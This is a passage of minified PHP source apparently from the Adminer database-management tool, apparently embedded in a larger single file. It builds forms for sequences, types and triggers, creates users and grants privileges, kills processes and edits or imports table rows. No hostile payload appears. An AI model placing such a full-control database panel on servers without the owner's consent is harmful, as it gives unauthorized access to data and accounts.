  9793. <p>';
  9794. textarea("definition",$K["definition"]);
  9795. echo '<p>
  9796. <input type="submit" value="Save">
  9797. ';
  9798. if($da!="") {
  9799. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  9800. }
  9801. echo '<input type="hidden" name="token" value="',$Ah, '">
  9802. </form>
  9803. ';
  9804. }elseif(isset($_GET["sequence"])) {
  9805. $fa=$_GET["sequence"];
  9806. $K=$_POST;
  9807. if($_POST&&!$n) {
  9808. $_=substr(ME, 0, -1);
  9809. $C=trim($K["name"]);
  9810. if($_POST["drop"])
  9811. query_redirect("DROP SEQUENCE ".idf_escape($fa),$_, 'Sequence has been dropped.');
  9812. elseif($fa=="")
  9813. query_redirect("CREATE SEQUENCE ".idf_escape($C),$_, 'Sequence has been created.');
  9814. elseif($fa!=$C)
  9815. query_redirect("ALTER SEQUENCE ".idf_escape($fa)." RENAME TO ".idf_escape($C),$_, 'Sequence has been altered.');
  9816. else
  9817. redirect($_);
  9818. }
  9819. page_header($fa!=""?'Alter sequence'.": ".h($fa):'Create sequence',$n);
  9820. if(!$K)
  9821. $K["name"]=$fa;
  9822. echo '
  9823. <form action="" method="post">
  9824. <p><input name="name" value="', h($K["name"]), '" autocapitalize="off">
  9825. <input type="submit" value="Save">
  9826. ';
  9827. if($fa!="")
  9828. echo "<input type='submit' name='drop' value='".'Drop'."'".confirm().">\n";
  9829. echo '<input type="hidden" name="token" value="',$Ah, '">
  9830. </form>
  9831. ';
  9832. }elseif(isset($_GET["type"])) {
  9833. $ga=$_GET["type"];
  9834. $K=$_POST;
  9835. if($_POST&&!$n) {
  9836. $_=substr(ME, 0, -1);
  9837. if($_POST["drop"])
  9838. query_redirect("DROP TYPE ".idf_escape($ga),$_, 'Type has been dropped.');
  9839. else
  9840. query_redirect("CREATE TYPE ".idf_escape(trim($K["name"]))." $K[as]",$_, 'Type has been created.');
  9841. }
  9842. page_header($ga!=""?'Alter type'.": ".h($ga):'Create type',$n);
  9843. if(!$K)
  9844. $K["as"]="AS ";
  9845. echo '
  9846. <form action="" method="post">
  9847. <p>
  9848. ';
  9849. if($ga!="")
  9850. echo "<input type='submit' name='drop' value='".'Drop'."'".confirm().">\n";
  9851. else {
  9852. echo "<input type='text' name='name' value='".h($K['name'])."' autocapitalize='off'>\n";
  9853. textarea("as",$K["as"]);
  9854. echo "<p><input type='submit' value='".'Save'."'>\n";
  9855. }
  9856. echo '<input type="hidden" name="token" value="',$Ah, '">
  9857. </form>
  9858. ';
  9859. }elseif(isset($_GET["trigger"])) {
  9860. $a=$_GET["trigger"];
  9861. $C=$_GET["name"];
  9862. $Kh=trigger_options();
  9863. $K=(array) trigger($C)+array("Trigger"=>$a."_bi");
  9864. if($_POST) {
  9865. if(!$n&&in_array($_POST["Timing"],$Kh["Timing"])&&in_array($_POST["Event"],$Kh["Event"])&&in_array($_POST["Type"],$Kh["Type"])) {
  9866. $Pe=" ON ".table($a);
  9867. $Xb="DROP TRIGGER ".idf_escape($C).($x=="pgsql"?$Pe:"");
  9868. $A=ME."table=".urlencode($a);
  9869. if($_POST["drop"])
  9870. query_redirect($Xb,$A, 'Trigger has been dropped.');
  9871. else {
  9872. if($C!="")
  9873. queries($Xb);
  9874. queries_redirect($A, ($C!=""?'Trigger has been altered.':'Trigger has been created.'), queries(create_trigger($Pe,$_POST)));
  9875. if($C!="")
  9876. queries(create_trigger($Pe,$K+array("Type"=>reset($Kh["Type"]))));
  9877. }
  9878. }
  9879. $K=$_POST;
  9880. }
  9881. page_header(($C!=""?'Alter trigger'.": ".h($C):'Create trigger'),$n, array("table"=>$a));
  9882. echo '
  9883. <form action="" method="post" id="form">
  9884. <table id="menustable" cellspacing="0" border="1">
  9885. <tr><td>Time<td>', html_select("Timing",$Kh["Timing"],$K["Timing"], "triggerChange(/^".preg_quote($a, "/")."_[ba][iud]$/, '".js_escape($a)."', this.form);"), '<tr>
  9886. <td>Event<td>', html_select("Event",$Kh["Event"],$K["Event"], "this.form['Timing'].onchange();"),(in_array("UPDATE OF",$Kh["Event"])?" <input name='Of' value='".h($K["Of"])."' class='hidden'>":""), '<tr>
  9887. <td>Type<td>', html_select("Type",$Kh["Type"],$K["Type"]), '</table>
  9888. <p>Name: <input type="text" name="Trigger" value="'. h($K["Trigger"]).'" maxlength="64" autocapitalize="off">
  9889. <script type="text/javascript">document.getElementById(\'form\')[\'Timing\'].onchange();</script>
  9890. <p>';
  9891. textarea("Statement",$K["Statement"]);
  9892. echo '<p>
  9893. <input type="submit" value="Save">
  9894. ';
  9895. if($C!="") {
  9896. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  9897. }
  9898. echo '<input type="hidden" name="token" value="',$Ah, '">
  9899. </form>
  9900. ';
  9901. }elseif(isset($_GET["user"])) {
  9902. $ha=$_GET["user"];
  9903. $Mf=array(""=>array("All privileges"=>""));
  9904. foreach(get_rows("SHOW PRIVILEGES") as $K) {
  9905. foreach(explode(",",($K["Privilege"]=="Grant option"?"":$K["Context"])) as $xb)
  9906. $Mf[$xb][$K["Privilege"]]=$K["Comment"];
  9907. }
  9908. $Mf["Server Admin"]+=$Mf["File access on server"];
  9909. $Mf["Databases"]["Create routine"]=$Mf["Procedures"]["Create routine"];
  9910. unset($Mf["Procedures"]["Create routine"]);
  9911. $Mf["Columns"]=array();
  9912. foreach(array("Select","Insert","Update","References") as $X)
  9913. $Mf["Columns"][$X]=$Mf["Tables"][$X];
  9914. unset($Mf["Server Admin"]["Usage"]);
  9915. foreach($Mf["Tables"] as $y=>$X)
  9916. unset($Mf["Databases"][$y]);
  9917. $Be=array();
  9918. if($_POST) {
  9919. foreach($_POST["objects"] as $y=>$X)
  9920. $Be[$X]=(array) $Be[$X]+(array) $_POST["grants"][$y];
  9921. }
  9922. $Zc=array();
  9923. $Ne="";
  9924. if(isset($_GET["host"])&&($I=$g->query("SHOW GRANTS FOR ".q($ha)."@".q($_GET["host"])))) {
  9925. while($K=$I->fetch_row()) {
  9926. if(preg_match('~GRANT (.*) ON (.*) TO ~',$K[0],$B)&&preg_match_all('~ *([^(,]*[^ ,(])( *\\([^)]+\\))?~',$B[1],$he, PREG_SET_ORDER)) {
  9927. foreach($he as $X) {
  9928. if($X[1]!="USAGE")
  9929. $Zc["$B[2]$X[2]"][$X[1]]=true;
  9930. if(preg_match('~ WITH GRANT OPTION~',$K[0]))
  9931. $Zc["$B[2]$X[2]"]["GRANT OPTION"]=true;
  9932. }
  9933. }
  9934. if(preg_match("~ IDENTIFIED BY PASSWORD '([^']+)~",$K[0],$B))
  9935. $Ne=$B[1];
  9936. }
  9937. }
  9938. if($_POST&&!$n) {
  9939. $Oe=(isset($_GET["host"])?q($ha)."@".q($_GET["host"]):"''");
  9940. if($_POST["drop"])
  9941. query_redirect("DROP USER $Oe",ME."privileges=",'User has been dropped.');
  9942. else {
  9943. $De=q($_POST["user"])."@".q($_POST["host"]);
  9944. $vf=$_POST["pass"];
  9945. if($vf!=''&&!$_POST["hashed"]) {
  9946. $vf=$g->result("SELECT PASSWORD(".q($vf).")");
  9947. $n=!$vf;
  9948. }
  9949. $Bb=false;
  9950. if(!$n) {
  9951. if($Oe!=$De) {
  9952. $Bb=queries(($g->server_info<5?"GRANT USAGE ON *.* TO":"CREATE USER")." $De IDENTIFIED BY PASSWORD ".q($vf));
  9953. $n=!$Bb;
  9954. }elseif($vf!=$Ne)
  9955. queries("SET PASSWORD FOR $De = ".q($vf));
  9956. }
  9957. if(!$n) {
  9958. $lg=array();
  9959. foreach($Be as $Ie=>$Yc) {
  9960. if(isset($_GET["grant"]))
  9961. $Yc=array_filter($Yc);
  9962. $Yc=array_keys($Yc);
  9963. if(isset($_GET["grant"]))
  9964. $lg=array_diff(array_keys(array_filter($Be[$Ie], 'strlen')),$Yc);
  9965. elseif($Oe==$De) {
  9966. $Le=array_keys((array) $Zc[$Ie]);
  9967. $lg=array_diff($Le,$Yc);
  9968. $Yc=array_diff($Yc,$Le);
  9969. unset($Zc[$Ie]);
  9970. }
  9971. if(preg_match('~^(.+)\\s*(\\(.*\\))?$~U',$Ie,$B)&&(!grant("REVOKE",$lg,$B[2], " ON $B[1] FROM $De")||!grant("GRANT",$Yc,$B[2], " ON $B[1] TO $De"))) {
  9972. $n=true;
  9973. break;
  9974. }
  9975. }
  9976. }
  9977. if(!$n&&isset($_GET["host"])) {
  9978. if($Oe!=$De)
  9979. queries("DROP USER $Oe");
  9980. elseif(!isset($_GET["grant"])) {
  9981. foreach($Zc as $Ie=>$lg) {
  9982. if(preg_match('~^(.+)(\\(.*\\))?$~U',$Ie,$B))
  9983. grant("REVOKE",array_keys($lg),$B[2], " ON $B[1] FROM $De");
  9984. }
  9985. }
  9986. }
  9987. queries_redirect(ME."privileges=",(isset($_GET["host"])?'User has been altered.':'User has been created.'), !$n);
  9988. if($Bb)
  9989. $g->query("DROP USER $De");
  9990. }
  9991. }
  9992. page_header((isset($_GET["host"])?'Username'.": ".h("$ha@$_GET[host]"):'Create user'),$n, array(
  9993. "privileges"=>array('','Privileges')));
  9994. if($_POST) {
  9995. $K=$_POST;
  9996. $Zc=$Be;
  9997. }else{
  9998. $K=$_GET+array("host"=>$g->result("SELECT SUBSTRING_INDEX(CURRENT_USER, '@', -1)"));
  9999. $K["pass"]=$Ne;
  10000. if($Ne!="")
  10001. $K["hashed"]=true;
  10002. $Zc[(DB==""||$Zc?"":idf_escape(addcslashes(DB, "%_\\"))).".*"]=array();
  10003. }
  10004. echo '<form action="" method="post">
  10005. <table id="menustable" cellspacing="0" border="1">
  10006. <tr><td>Server<td><input type="text" name="host" maxlength="60" value="', h($K["host"]), '" autocapitalize="off">
  10007. <tr><td>Username<td><input type="text" name="user" maxlength="16" value="', h($K["user"]), '" autocapitalize="off">
  10008. <tr><td>Password<td><input type="text" name="pass" id="pass" value="', h($K["pass"]), '">';
  10009. if(!$K["hashed"]) {
  10010. echo '<script type="text/javascript">typePassword(document.getElementById(\'pass\'));</script>';
  10011. }
  10012. echo checkbox("hashed",1,$K["hashed"], 'Hashed', "typePassword(this.form['pass'], this.checked);"), '</table>';
  10013. echo "<table id='menustable' cellspacing='0' border='1'>\n","<thead><tr><th colspan='2'>".'Privileges'.doc_link(array('sql'=>"grant.html#priv_level"));
  10014. $s=0;
  10015. foreach($Zc as $Ie=>$Yc) {
  10016. echo '<td>'.($Ie!="*.*"?"<input type='text' name='objects[$s]' value='".h($Ie)."' size='10' autocapitalize='off'>":"<input type='hidden' name='objects[$s]' value='*.*' size='10'>*.*");
  10017. $s++;
  10018. }
  10019. echo "</thead>\n";
  10020. foreach(array(""=>"","Server Admin"=>'Server',"Databases"=>'Database',"Tables"=>'Table',"Columns"=>'Column',"Procedures"=>'Routine') as $xb=>$Nb) {
  10021. foreach((array) $Mf[$xb] as $Lf=>$qb) {
  10022. echo "<tr".odd()."><td".($Nb?">$Nb<td":" colspan='2'").' lang="en" title="'.h($qb).'">'.h($Lf);
  10023. $s=0;
  10024. foreach($Zc as $Ie=>$Yc) {
  10025. $C="'grants[$s][".h(strtoupper($Lf))."]'";
  10026. $Y=$Yc[strtoupper($Lf)];
  10027. if($xb=="Server Admin"&&$Ie!=(isset($Zc["*.*"])?"*.*":".*"))
  10028. echo "<td>&nbsp;";
  10029. elseif(isset($_GET["grant"]))
  10030. echo "<td><select name=$C><option><option value='1'".($Y?" selected":"").">".'Grant'."<option value='0'".($Y=="0"?" selected":"").">".'Revoke'."</select>";
  10031. else
  10032. echo "<td align='center'><label class='block'><input type='checkbox' name=$C value='1'".($Y?" checked":"").($Lf=="All privileges"?" id='grants-$s-all'":($Lf=="Grant option"?"":" onclick=\"if (this.checked) formUncheck('grants-$s-all');\""))."></label>";
  10033. $s++;
  10034. }
  10035. }
  10036. }
  10037. echo "</table>\n",'<p>
  10038. <input type="submit" value="Save">
  10039. ';
  10040. if(isset($_GET["host"])) {
  10041. echo '<input type="submit" name="drop" value="Drop"', confirm(), '>';
  10042. }
  10043. echo '<input type="hidden" name="token" value="',$Ah, '">
  10044. </form>
  10045. ';
  10046. }elseif(isset($_GET["processlist"])) {
  10047. if(support("kill")&&$_POST&&!$n) {
  10048. $Od=0;
  10049. foreach((array) $_POST["kill"] as $X) {
  10050. if(kill_process($X))
  10051. $Od++;
  10052. }
  10053. queries_redirect(ME."processlist=",lang(array('%d process has been killed.','%d processes have been killed.'),$Od),$Od||!$_POST["kill"]);
  10054. }
  10055. page_header('Process list',$n);
  10056. echo '
  10057. <form action="" method="post">
  10058. <table id="menustable" border="1" cellspacing="0" onclick="tableClick(event);" ondblclick="tableClick(event, true);" class="nowrap checkable">
  10059. ';
  10060. $s=-1;
  10061. foreach(process_list() as $s=>$K) {
  10062. if(!$s) {
  10063. echo "<thead><tr lang='en'>".(support("kill")?"<td>&nbsp;":"");
  10064. foreach($K as $y=>$X)
  10065. echo "<td>$y".doc_link(array('sql'=>"show-processlist.html#processlist_".strtolower($y),'pgsql'=>"monitoring-stats.html#PG-STAT-ACTIVITY-VIEW",'oracle'=>"../b14237/dynviews_2088.htm"));
  10066. echo "</thead>\n";
  10067. }
  10068. echo "<tr".odd().">".(support("kill")?"<td>".checkbox("kill[]",$K[$x=="sql"?"Id":"pid"], 0):"");
  10069. foreach($K as $y=>$X)
  10070. echo "<td>".(($x=="sql"&&$y=="Info"&&preg_match("~Query|Killed~",$K["Command"])&&$X!="")||($x=="pgsql"&&$y=="current_query"&&$X!="<IDLE>")||($x=="oracle"&&$y=="sql_text"&&$X!="")?"<span class='jush-$x'>".shorten_utf8($X, 100, "</span>").' <a href="'.h(ME.($K["db"]!=""?"db=".urlencode($K["db"])."&":"")."sql=".urlencode($X)).'">'.'Clone'.'</a>':nbsp($X));
  10071. echo "\n";
  10072. }
  10073. echo '</table>
  10074. <script type=\'text/javascript\'>tableCheck();</script>
  10075. <p>
  10076. ';
  10077. if(support("kill")) {
  10078. echo ($s+1)."/".sprintf('%d in total', max_connections()), "<p><input type='submit' value='".'Kill'."'>\n";
  10079. }
  10080. echo '<input type="hidden" name="token" value="',$Ah, '">
  10081. </form>
  10082. ';
  10083. }elseif(isset($_GET["replication"])) {
  10084. page_header('Replication');
  10085. echo "<h3>".'Master status'.doc_link(array("sql"=>"show-master-status.html"))."</h3>\n";
  10086. $fe=replication_status("MASTER");
  10087. if(!$fe)
  10088. echo "<p class='message'>".'No rows.'."\n";
  10089. else {
  10090. echo "<table id='menustable' cellspacing='0' border='1'>\n";
  10091. foreach($fe[0] as $y=>$X) {
  10092. echo "<tr>","<td>".h($y), "<td>".nbsp($X);
  10093. }
  10094. echo "</table>\n";
  10095. }
  10096. $Kg=replication_status("SLAVE");
  10097. if($Kg) {
  10098. echo "<h3>".'Slave status'.doc_link(array("sql"=>"show-slave-status.html"))."</h3>\n";
  10099. foreach($Kg[0] as $Jg) {
  10100. echo "<table id='menustable' cellspacing='0' border='1' id='menustable'>\n";
  10101. foreach($Jg as $y=>$X) {
  10102. echo "<tr>","<td>".h($y), "<td>".nbsp($X);
  10103. }
  10104. echo "</table>\n";
  10105. }
  10106. }
  10107. }elseif(isset($_GET["select"])) {
  10108. $a=$_GET["select"];
  10109. $S=table_status1($a);
  10110. $w=indexes($a);
  10111. $p=fields($a);
  10112. $Rc=column_foreign_keys($a);
  10113. $Ke="";
  10114. if($S["Oid"]) {
  10115. $Ke=($x=="sqlite"?"rowid":"oid");
  10116. $w[]=array("type"=>"PRIMARY","columns"=>array($Ke));
  10117. }
  10118. parse_str($_COOKIE["adminer_import"],$xa);
  10119. $mg=array();
  10120. $f=array();
  10121. $rh=null;
  10122. foreach($p as $y=>$o) {
  10123. $C=$b->fieldName($o);
  10124. if(isset($o["privileges"]["select"])&&$C!="") {
  10125. $f[$y]=html_entity_decode(strip_tags($C), ENT_QUOTES);
  10126. if(is_shortable($o))
  10127. $rh=$b->selectLengthProcess();
  10128. }
  10129. $mg+=$o["privileges"];
  10130. }
  10131. list($M,$ad)=$b->selectColumnsProcess($f,$w);
  10132. $Cd=count($ad)<count($M);
  10133. $Z=$b->selectSearchProcess($p,$w);
  10134. $af=$b->selectOrderProcess($p,$w);
  10135. $z=$b->selectLimitProcess();
  10136. $Wc=($M?implode(",",$M):"*".($Ke?",$Ke":"")).convert_fields($f,$p,$M)."\nFROM ".table($a);
  10137. $bd=($ad&&$Cd?"\nGROUP BY ".implode(",",$ad):"").($af?"\nORDER BY ".implode(",",$af):"");
  10138. if($_GET["val"]&&is_ajax()) {
  10139. header("Content-Type: text/plain; charset=utf-8");
  10140. foreach($_GET["val"] as $Sh=>$K) {
  10141. $Fa=convert_field($p[key($K)]);
  10142. $M=array($Fa?$Fa:idf_escape(key($K)));
  10143. $Z[]=where_check($Sh,$p);
  10144. $J=$Vb->select($a,$M,$Z,$M);
  10145. if($J)
  10146. echo reset($J->fetch_row());
  10147. }
  10148. exit;
  10149. }
  10150. if($_POST&&!$n) {
  10151. $pi=$Z;
  10152. if(!$_POST["all"]&&is_array($_POST["check"])) {
  10153. $db=array();
  10154. foreach($_POST["check"] as $ab)
  10155. $db[]=where_check($ab,$p);
  10156. $pi[]="((".implode(") OR (",$db)."))";
  10157. }
  10158. $pi=($pi?"\nWHERE ".implode(" AND ",$pi):"");
  10159. $Hf=$Uh=null;
  10160. foreach($w as $v) {
  10161. if($v["type"]=="PRIMARY") {
  10162. $Hf=array_flip($v["columns"]);
  10163. $Uh=($M?$Hf:array());
  10164. break;
  10165. }
  10166. }
  10167. foreach((array) $Uh as $y=>$X) {
  10168. if(in_array(idf_escape($y),$M))
  10169. unset($Uh[$y]);
  10170. }
  10171. if($_POST["export"]) {
  10172. cookie("adminer_import","output=".urlencode($_POST["output"])."&format=".urlencode($_POST["format"]));
  10173. dump_headers($a);
  10174. $b->dumpTable($a, "");
  10175. if(!is_array($_POST["check"])||$Uh===array())
  10176. $H="SELECT $Wc$pi$bd";
  10177. else {
  10178. $Qh=array();
  10179. foreach($_POST["check"] as $X)
  10180. $Qh[]="(SELECT".limit($Wc, "\nWHERE ".($Z?implode(" AND ",$Z)." AND ":"").where_check($X,$p).$bd, 1).")";
  10181. $H=implode(" UNION ALL ",$Qh);
  10182. }
  10183. $b->dumpData($a, "table",$H);
  10184. exit;
  10185. }
  10186. if(!$b->selectEmailProcess($Z,$Rc)) {
  10187. if($_POST["save"]||$_POST["delete"]) {
  10188. $I=true;
  10189. $ya=0;
  10190. $O=array();
  10191. if(!$_POST["delete"]) {
  10192. foreach($f as $C=>$X) {
  10193. $X=process_input($p[$C]);
  10194. if($X!==null&&($_POST["clone"]||$X!==false))
  10195. $O[idf_escape($C)]=($X!==false?$X:idf_escape($C));
  10196. }
  10197. }
  10198. if($_POST["delete"]||$O) {
  10199. if($_POST["clone"])
  10200. $H="INTO ".table($a)." (".implode(",",array_keys($O)).")\nSELECT ".implode(",",$O)."\nFROM ".table($a);
  10201. if($_POST["all"]||($Uh===array()&&is_array($_POST["check"]))||$Cd) {
  10202. $I=($_POST["delete"]?$Vb->delete($a,$pi):($_POST["clone"]?queries("INSERT $H$pi"):$Vb->update($a,$O,$pi)));
  10203. $ya=$g->affected_rows;
  10204. }else{
  10205. foreach((array) $_POST["check"] as $X) {
  10206. $oi="\nWHERE ".($Z?implode(" AND ",$Z)." AND ":"").where_check($X,$p);
  10207. $I=($_POST["delete"]?$Vb->delete($a,$oi, 1):($_POST["clone"]?queries("INSERT".limit1($H,$oi)):$Vb->update($a,$O,$oi)));
  10208. if(!$I)
  10209. break;
  10210. $ya+=$g->affected_rows;
  10211. }
  10212. }
  10213. }
  10214. $pe=lang(array('%d item has been affected.','%d items have been affected.'),$ya);
  10215. if($_POST["clone"]&&$I&&$ya==1) {
  10216. $Td=last_id();
  10217. if($Td)
  10218. $pe=sprintf('Item%s has been inserted.', " $Td");
  10219. }
  10220. queries_redirect(remove_from_uri($_POST["all"]&&$_POST["delete"]?"page":""),$pe,$I);
  10221. if(!$_POST["delete"]) {
  10222. edit_form($a,$p, (array) $_POST["fields"], !$_POST["clone"]);
  10223. page_footer();
  10224. exit;
  10225. }
  10226. }elseif(!$_POST["import"]) {
  10227. if(!$_POST["val"])
  10228. $n='Ctrl+click on a value to modify it.';
  10229. else {
  10230. $I=true;
  10231. $ya=0;
  10232. foreach($_POST["val"] as $Sh=>$K) {
  10233. $O=array();
  10234. foreach($K as $y=>$X) {
  10235. $y=bracket_escape($y, 1);
  10236. $O[idf_escape($y)]=(preg_match('~char|text~',$p[$y]["type"])||$X!=""?$b->processInput($p[$y],$X):"NULL");
  10237. }
  10238. $I=$Vb->update($a,$O, " WHERE ".($Z?implode(" AND ",$Z)." AND ":"").where_check($Sh,$p), !($Cd||$Uh===array()), " ");
  10239. if(!$I)
  10240. break;
  10241. $ya+=$g->affected_rows;
  10242. }
  10243. queries_redirect(remove_from_uri(), lang(array('%d item has been affected.','%d items have been affected.'),$ya),$I);
  10244. }
  10245. }elseif(!is_string($Hc=get_file("csv_file",true)))
  10246. $n=upload_error($Hc);
  10247. elseif(!preg_match('~~u',$Hc))
  10248. $n='File must be in UTF-8 encoding.';
  10249. else {
  10250. cookie("adminer_import","output=".urlencode($xa["output"])."&format=".urlencode($_POST["separator"]));
  10251. $I=true;
  10252. $nb=array_keys($p);
  10253. preg_match_all('~(?>"[^"]*"|[^"\\r\\n]+)+~',$Hc,$he);
  10254. $ya=count($he[0]);
  10255. $Vb->begin();
  10256. $Ag=($_POST["separator"]=="csv"?",":($_POST["separator"]=="tsv"?"\t":";"));
  10257. $L=array();
  10258. foreach($he[0] as $y=>$X) {
  10259. preg_match_all("~((?>\"[^\"]*\")+|[^$Ag]*)$Ag~",$X.$Ag,$ie);
  10260. if(!$y&&!array_diff($ie[1],$nb)) {
  10261. $nb=$ie[1];
  10262. $ya--;
  10263. }else{
  10264. $O=array();
  10265. foreach($ie[1] as $s=>$kb)
  10266. $O[idf_escape($nb[$s])]=($kb==""&&$p[$nb[$s]]["null"]?"NULL":q(str_replace('""','"', preg_replace('~^"|"$~','',$kb))));
  10267. $L[]=$O;
  10268. }
  10269. }
  10270. $I=(!$L||$Vb->insertUpdate($a,$L,$Hf));
  10271. if($I)
  10272. $I=$Vb->commit();
  10273. queries_redirect(remove_from_uri("page"), lang(array('%d row has been imported.','%d rows have been imported.'),$ya),$I);
  10274. $Vb->rollback();
  10275. }
  10276. }
  10277. }
  10278. $dh=$b->tableName($S);
  10279. if(is_ajax()) {
  10280. page_headers();
  10281. ob_start();
  10282. } else
  10283. page_header('Select'.": $dh",$n);
  10284. $O=null;
  10285. if(isset($mg["insert"])||!support("table")) {
  10286. $O="";
  10287. foreach((array) $_GET["where"] as $X) {
  10288. if(count($Rc[$X["col"]])==1&&($X["op"]=="="||(!$X["op"]&&!preg_match('~[_%]~',$X["val"]))))
  10289. $O.="&set".urlencode("[".bracket_escape($X["col"])."]")."=".urlencode($X["val"]);
  10290. }
  10291. }
  10292. $b->selectLinks($S,$O);
  10293. if(!$f&&support("table"))
  10294. echo "<p class='error'>".'Unable to select the table'.($p?".":": ".error())."\n";
  10295. else {
  10296. echo "<form action='' id='form'>\n","<div style='display: none;'>";
  10297. hidden_fields_get();
  10298. echo (DB!=""?'<input type="hidden" name="db" value="'.h(DB).'">'.(isset($_GET["ns"])?'<input type="hidden" name="ns" value="'.h($_GET["ns"]).'">':""):"");
  10299. echo '<input type="hidden" name="select" value="'.h($a).'">', "</div>\n";
  10300. $b->selectColumnsPrint($M,$f);
  10301. $b->selectSearchPrint($Z,$f,$w);
  10302. $b->selectOrderPrint($af,$f,$w);
  10303. $b->selectLimitPrint($z);
  10304. $b->selectLengthPrint($rh);
  10305. $b->selectActionPrint($w);
  10306. echo "</form>\n";
  10307. $E=$_GET["page"];
  10308. if($E=="last") {
  10309. $Uc=$g->result(count_rows($a,$Z,$Cd,$ad));
  10310. $E=floor(max(0,$Uc-1)/$z);
  10311. }
  10312. $yg=$M;
  10313. if(!$yg) {
  10314. $yg[]="*";
  10315. if($Ke)
  10316. $yg[]=$Ke;
  10317. }
  10318. $yb=convert_fields($f,$p,$M);
  10319. if($yb)
  10320. $yg[]=substr($yb, 2);
  10321. $I=$Vb->select($a,$yg,$Z,$ad,$af,$z,$E, true);
  10322. if(!$I)
  10323. echo "<p class='error'>".error()."\n";
  10324. else {
  10325. if($x=="mssql"&&$E)
  10326. $I->seek($z*$E);
  10327. $kc=array();
  10328. echo "<form action='' method='post' enctype='multipart/form-data'>\n";
  10329. $L=array();
  10330. while($K=$I->fetch_assoc()) {
  10331. if($E&&$x=="oracle")
  10332. unset($K["RNUM"]);
  10333. $L[]=$K;
  10334. }
  10335. if($_GET["page"]!="last"&&+$z&&$ad&&$Cd&&$x=="sql")
  10336. $Uc=$g->result(" SELECT FOUND_ROWS()");
  10337. if(!$L)
  10338. echo "<p class='message'>".'No rows.'."\n";
  10339. else {
  10340. $Oa=$b->backwardKeys($a,$dh);
  10341. echo "<table id='menustable' border='1' id='table' cellspacing='0' class='nowrap checkable' onclick='tableClick(event);' ondblclick='tableClick(event, true);' onkeydown='return editingKeydown(event);'>\n","<thead><tr>".(!$ad&&$M?"":"<td><input type='checkbox' id='all-page' onclick='formCheck(this, /check/);' class='js only'> <a href='".h($_GET["modify"]?remove_from_uri("modify"):$_SERVER["REQUEST_URI"]."&modify=1")."'>".'Modify'."</a>");
  10342. $Ae=array();
  10343. $Xc=array();
  10344. reset($M);
  10345. $Vf=1;
  10346. foreach($L[0] as $y=>$X) {
  10347. if($y!=$Ke) {
  10348. $X=$_GET["columns"][key($M)];
  10349. $o=$p[$M?($X?$X["col"]:current($M)):$y];
  10350. $C=($o?$b->fieldName($o,$Vf):($X["fun"]?"*":$y));
  10351. if($C!="") {
  10352. $Vf++;
  10353. $Ae[$y]=$C;
  10354. $e=idf_escape($y);
  10355. $ld=remove_from_uri('(order|desc)[^=]*|page').'&order%5B0%5D='.urlencode($y);
  10356. $Nb="&desc%5B0%5D=1";
  10357. echo '<td onmouseover="columnMouse(this);" onmouseout="columnMouse(this, \' hidden\');">','<a href="'.h($ld.($af[0]==$e||$af[0]==$y||(!$af&&$Cd&&$ad[0]==$e)?$Nb:'')).'">';
  10358. echo apply_sql_function($X["fun"],$C)."</a>";
  10359. echo "<span class='column hidden'>","<a href='".h($ld.$Nb)."' title='".'descending'."' class='text'> &darr;</a>";
  10360. if(!$X["fun"])
  10361. echo '<a href="#fieldset-search" onclick="selectSearch(\''.h(js_escape($y)).'\'); return false;" title="'.'Search'.'" class="text js only"> =</a>';
  10362. echo "</span>";
  10363. }
  10364. $Xc[$y]=$X["fun"];
  10365. next($M);
  10366. }
  10367. }
  10368. $Zd=array();
  10369. if($_GET["modify"]) {
  10370. foreach($L as $K) {
  10371. foreach($K as $y=>$X)
  10372. $Zd[$y]=max($Zd[$y], min(40, strlen(utf8_decode($X))));
  10373. }
  10374. }
  10375. echo ($Oa?"<td>".'Relations':"")."</thead>\n";
  10376. if(is_ajax()) {
  10377. if($z%2==1&&$E%2==1)
  10378. odd();
  10379. ob_end_clean();
  10380. }
  10381. foreach($b->rowDescriptions($L,$Rc) as $_e=>$K) {
  10382. $Rh=unique_array($L[$_e],$w);
  10383. if(!$Rh) {
  10384. $Rh=array();
  10385. foreach($L[$_e] as $y=>$X) {
  10386. if(!preg_match('~^(COUNT\\((\\*|(DISTINCT )?`(?:[^`]|``)+`)\\)|(AVG|GROUP_CONCAT|MAX|MIN|SUM)\\(`(?:[^`]|``)+`\\))$~',$y))
  10387. $Rh[$y]=$X;
  10388. }
  10389. }
  10390. $Sh="";
  10391. foreach($Rh as $y=>$X) {
  10392. if(($x=="sql"||$x=="pgsql")&&strlen($X)>64) {
  10393. $y=(strpos($y, '(')?$y:idf_escape($y));
  10394. $y="MD5(".($x=='sql'&&preg_match("~^utf8_~",$p[$y]["collation"])?$y:"CONVERT($y USING ".charset($g).")").")";
  10395. $X=md5($X);
  10396. }
  10397. $Sh.="&".($X!==null?urlencode("where[".bracket_escape($y)."]")."=".urlencode($X):"null%5B%5D=".urlencode($y));
  10398. }
  10399. echo "<tr".odd().">".(!$ad&&$M?"":"<td>".checkbox("check[]",substr($Sh, 1), in_array(substr($Sh, 1),(array) $_POST["check"]), "","this.form['all'].checked = false; formUncheck('all-page');").($Cd||information_schema(DB)?"":" <a href='".h(ME."edit=".urlencode($a).$Sh)."'>".'edit'."</a>"));
  10400. foreach($K as $y=>$X) {
  10401. if(isset($Ae[$y])) {
  10402. $o=$p[$y];
  10403. if($X!=""&&(!isset($kc[$y])||$kc[$y]!=""))
  10404. $kc[$y]=(is_mail($X)?$Ae[$y]:"");
  10405. $_="";
  10406. if(preg_match('~blob|bytea|raw|file~',$o["type"])&&$X!="")
  10407. $_=ME.'download='.urlencode($a).'&field='.urlencode($y).$Sh;
  10408. if(!$_&&$X!==null) {
  10409. foreach((array) $Rc[$y] as $q) {
  10410. if(count($Rc[$y])==1||end($q["source"])==$y) {
  10411. $_="";
  10412. foreach($q["source"] as $s=>$Ng)
  10413. $_.=where_link($s,$q["target"][$s],$L[$_e][$Ng]);
  10414. $_=($q["db"]!=""?preg_replace('~([?&]db=)[^&]+~','\\1'.urlencode($q["db"]), ME):ME).'select='.urlencode($q["table"]).$_;
  10415. if($q["ns"])
  10416. $_=preg_replace('~([?&]ns=)[^&]+~','\\1'.urlencode($q["ns"]),$_);
  10417. if(count($q["source"])==1)
  10418. break;
  10419. }
  10420. }
  10421. }
  10422. if($y=="COUNT(*)") {
  10423. $_=ME."select=".urlencode($a);
  10424. $s=0;
  10425. foreach((array) $_GET["where"] as $W) {
  10426. if(!array_key_exists($W["col"],$Rh))
  10427. $_.=where_link($s++,$W["col"],$W["val"],$W["op"]);
  10428. }
